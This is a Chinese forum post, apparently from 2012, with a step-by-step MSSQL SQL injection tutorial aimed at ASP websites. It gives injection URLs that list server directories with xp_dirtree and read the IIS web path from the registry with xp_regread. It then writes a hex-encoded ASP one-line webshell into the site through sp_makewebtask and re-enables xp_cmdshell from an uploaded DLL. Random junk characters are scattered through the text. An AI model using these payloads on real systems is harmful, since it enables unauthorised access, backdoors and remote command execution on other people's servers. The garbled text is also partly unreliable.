好,我们exec master..xp_dirtree'd:/test'
, ] R" N' z+ w9 Y" }假设我们在test里有两个文件夹test1和test2在test1里又有test3, f. M ^5 m* ?+ n% R
结果显示. F: y: e/ t) z k8 Y
' P- n" _& ^, U0 w- J$ ^subdirectory depth
4 e5 q/ c5 y9 m& `2 P& j* J0 w" U; ktest1 1 e5 B' ?, j( E5 G4 {
test3 2; d- x: C: D9 V
test2 1
( B5 D/ s/ y* \& q4 B8 p9 o8 a+ D. B8 L2 C" }
哈哈发现没有那个depth就是目录的级数
6 t$ O5 I* l$ V* _# Qok了,知道怎么办了吧
6 x4 q3 T8 d/ ]! @# v. e+ A }( i& I5 Q5 b6 f1 O
http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)--
0 p9 R" ~4 v$ B% H& m5 yhttp://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'd:\' -- & H0 ^8 I5 D& [' p
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)-
5 ]1 X, s6 o* i" E) [( t7 { B7 M- |# B
只要加上id=1,就是第一级目录 。
* F3 |- j' H# G: F5 o' n; J l+ n- X6 z4 O$ j: l: ]4 S8 M) |6 q+ l
i( C, L' w; m; n. V% N+ Z% D通过注册表读网站路径:
0 p) v; P C6 y; y8 `6 [( P) O8 I+ l" ?- _4 |0 \. [8 x
1.;create table [dbo].[cyfd] ([gyfd][char](255));. J# e/ K: | w: o8 Q0 r: f" @
+ Z5 ^# @! g2 e
2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--& x8 K) C) v" P6 ?
id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--6 k+ L& U& m5 s* y6 k7 Z
9 s) q' x; z3 O! Z0 ]3.and 1=(select count(*) from 临时表 where 临时字段名>1)
! P! @1 P5 B: Z3 P1 D, Z x7 qand 1=(select count(*) from cyfd where gyfd > 1)
0 Y7 ~# ~+ @& |! O这样IE报错,就把刚才插进去的Web路径的值报出来了
: y, q f5 _5 P+ l7 a& k" S/ z6 i8 Y7 b( F& r4 j/ T; U9 E7 E0 w
4.drop table cyfd;-- 删除临时表! d4 S/ a' w( c9 N# \0 o) Q, q0 e
5 B; g0 M6 n1 b$ k5 }# Q7 J
获得webshell方法:) K" b" z+ X4 ?1 S5 Y$ {
1.create table cmd (a image)-- \**cmd是创建的临时表
4 P6 f& n/ F4 P
! E/ y+ ], O1 t ]: h6 R. I2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话
' [2 Q& Y3 D! ^" E8 v( h/ c9 U j
4 f- M- o4 s' ?1 W! B1 R4 o: d7 v
3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'
* |9 K- d3 O" W0 ^' @9 ?: yEXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'
+ [4 R0 C& b9 @1 ?" a8 T6 J F5 V3 I; a8 E! X
4.drop table cmd;-- 删除cmd临时表
8 s' J( [$ t& M4 f
9 h G; u4 m% B. N9 W恢复xp_cmdshell方法之一:5 B9 q; ]% p9 I' M+ h
我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:0 K4 B. Y2 j& Z! T/ @$ K/ P% p
http://www.something.com/script.asp?id=2;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll'
1 v) H, O4 L' t R+ h H2 Q i& p恢复,支持绝对路径的恢复哦。:)
8 T, V. ~% j3 I# k$ @% G9 [- T |
发表于 2012-9-13 17:20:30
收藏
支持
反对